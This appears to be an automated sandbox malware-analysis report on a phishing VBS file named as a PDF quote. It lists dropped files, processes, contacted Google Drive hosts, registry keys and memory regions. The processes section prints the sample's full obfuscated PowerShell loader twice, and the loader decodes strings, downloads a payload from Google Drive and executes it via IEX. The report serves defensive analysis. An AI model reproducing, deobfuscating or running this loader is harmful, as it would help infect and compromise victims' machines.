Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
RFQ_24196MR_PDF.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_5bf5219ded9fba7eedec77d072a1c9e5c7a57c4_4aa59577_bced51df-f61f-4fea-9980-4eb0aca94c31\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD38.tmp.dmp
|
Mini DuMP crash report, 14 streams, Fri Oct 25 17:44:13 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE81.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEA1.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkgx4jan.30z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o42kqqmh.lxh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxg54pp.rr4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Solidifiable.Sch
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie
Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If
($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne
-lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function
Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi
nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA
UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn
ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd
togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str
fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U
sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut
s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc
FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi
';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr
ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell
Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c
Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize
' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa.
';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert
P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA
Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc
DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl.
Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne
(Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus
DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW
C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve
BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm
kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor
sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme
Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp
W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt
AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir
Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG
ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE
F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi
$T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne
Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol-
Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s:
IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A
tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng
Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE
grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO
Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos
GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu
Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko
Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie
PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD
graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam
yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT
retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof.
SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre
');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt
kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo
rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie
Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If
($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne
-lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function
Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi
nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA
UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn
ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd
togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str
fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U
sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut
s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc
FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi
';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr
ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell
Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c
Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize
' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa.
';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert
P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA
Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc
DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl.
Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne
(Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus
DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW
C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve
BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm
kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor
sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme
Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp
W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt
AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir
Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG
ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE
F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi
$T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne
Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol-
Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s:
IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A
tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng
Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE
grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO
Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos
GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu
Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko
Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie
PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD
graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam
yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT
retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof.
SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre
');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt
kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo
rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nuget.org/NuGet.exe
|
unknown
|
||
http://drive.usercontent.google.com
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://drive.usercontent.google.com(
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.usercontent.googh
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
http://drive.google.com
|
unknown
|
||
https://drive.google.com/5f
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://drive.google.com/=f
|
unknown
|
||
https://drive.googPR
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://aka.ms/pscore6lBdq
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
142.250.185.238
|
||
drive.usercontent.google.com
|
172.217.16.193
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.217.16.193
|
drive.usercontent.google.com
|
United States
|
||
142.250.185.238
|
drive.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
8610000
|
direct allocation
|
page execute and read and write
|
||
5665000
|
trusted library allocation
|
page read and write
|
||
1DEEBB8F000
|
trusted library allocation
|
page read and write
|
||
8DD5000
|
direct allocation
|
page execute and read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1DEDB860000
|
heap
|
page readonly
|
||
64C000
|
stack
|
page read and write
|
||
6FC3AFB000
|
stack
|
page read and write
|
||
1DEDB870000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
464D000
|
trusted library allocation
|
page read and write
|
||
2109F175000
|
heap
|
page read and write
|
||
1DEDC04B000
|
trusted library allocation
|
page read and write
|
||
2A2D000
|
heap
|
page read and write
|
||
20B3F000
|
stack
|
page read and write
|
||
8210000
|
heap
|
page read and write
|
||
2C6E000
|
stack
|
page read and write
|
||
1DED9E84000
|
heap
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
6EEE000
|
heap
|
page read and write
|
||
2D30000
|
trusted library allocation
|
page read and write
|
||
804E000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
2109EF4F000
|
heap
|
page read and write
|
||
1DEDDC56000
|
trusted library allocation
|
page read and write
|
||
6ADF000
|
stack
|
page read and write
|
||
2CC0000
|
trusted library section
|
page read and write
|
||
55F1000
|
trusted library allocation
|
page read and write
|
||
71E0000
|
heap
|
page read and write
|
||
76F68FE000
|
stack
|
page read and write
|
||
58DF000
|
heap
|
page read and write
|
||
2CF9000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1DEDBAE0000
|
heap
|
page execute and read and write
|
||
1DEDBBA6000
|
trusted library allocation
|
page read and write
|
||
6FC31FE000
|
stack
|
page read and write
|
||
58D8000
|
heap
|
page read and write
|
||
2101E000
|
stack
|
page read and write
|
||
1DED9E30000
|
heap
|
page read and write
|
||
2D15000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
3C60000
|
remote allocation
|
page execute and read and write
|
||
76F790B000
|
stack
|
page read and write
|
||
70CE000
|
stack
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
7490000
|
trusted library allocation
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
211A0000
|
heap
|
page execute and read and write
|
||
20F1C000
|
stack
|
page read and write
|
||
1DEF41AB000
|
heap
|
page read and write
|
||
81CC000
|
stack
|
page read and write
|
||
2109EEE4000
|
heap
|
page read and write
|
||
2109EF38000
|
heap
|
page read and write
|
||
1DEF41B9000
|
heap
|
page read and write
|
||
4580000
|
trusted library allocation
|
page read and write
|
||
210A09B7000
|
heap
|
page read and write
|
||
5850000
|
direct allocation
|
page read and write
|
||
1DEEBB30000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
20E2E000
|
stack
|
page read and write
|
||
210A09AF000
|
heap
|
page read and write
|
||
85BE000
|
stack
|
page read and write
|
||
454E000
|
stack
|
page read and write
|
||
7480000
|
trusted library allocation
|
page read and write
|
||
689000
|
stack
|
page read and write
|
||
20BBC000
|
stack
|
page read and write
|
||
6FC37FE000
|
stack
|
page read and write
|
||
29E5000
|
unkown
|
page read and write
|
||
2109EF12000
|
heap
|
page read and write
|
||
2109EF68000
|
heap
|
page read and write
|
||
1DEF4000000
|
heap
|
page read and write
|
||
76F636E000
|
stack
|
page read and write
|
||
6C40000
|
direct allocation
|
page read and write
|
||
2109EF15000
|
heap
|
page read and write
|
||
2109EEA9000
|
heap
|
page read and write
|
||
2CE0000
|
trusted library allocation
|
page read and write
|
||
586A000
|
heap
|
page read and write
|
||
72C0000
|
heap
|
page read and write
|
||
6CA0000
|
direct allocation
|
page read and write
|
||
74A0000
|
trusted library allocation
|
page read and write
|
||
82DC000
|
heap
|
page read and write
|
||
2109EEAD000
|
heap
|
page read and write
|
||
82B0000
|
trusted library allocation
|
page read and write
|
||
2109EE60000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
2109EF09000
|
heap
|
page read and write
|
||
3D85000
|
remote allocation
|
